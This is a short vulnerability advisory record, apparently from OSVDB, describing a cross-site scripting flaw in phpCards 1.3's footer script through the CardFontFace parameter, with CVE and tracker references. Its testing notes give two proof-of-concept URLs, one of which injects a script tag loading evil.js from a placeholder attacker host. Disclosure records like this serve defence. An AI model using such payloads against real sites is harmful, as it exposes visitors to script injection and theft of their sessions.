phpCards phpcards.footer.php CardFontFace Variable XSS

2006-10-16T21:12:10
ID OSVDB:34251
Type osvdb
Reporter OSVDB
Modified 2006-10-16T21:12:10

Description

Manual Testing Notes

/phpcardsv1.3/phpcards.footer.php?CardFontFace="><i>xss</i>

/phpcardsv1.3/phpcards.footer.php?CardFontFace="><script%20src%3dhttp://[attacker]/evil.js></script>

References:

Security Tracker: 1017070
ISS X-Force ID: 29616
CVE-2006-5605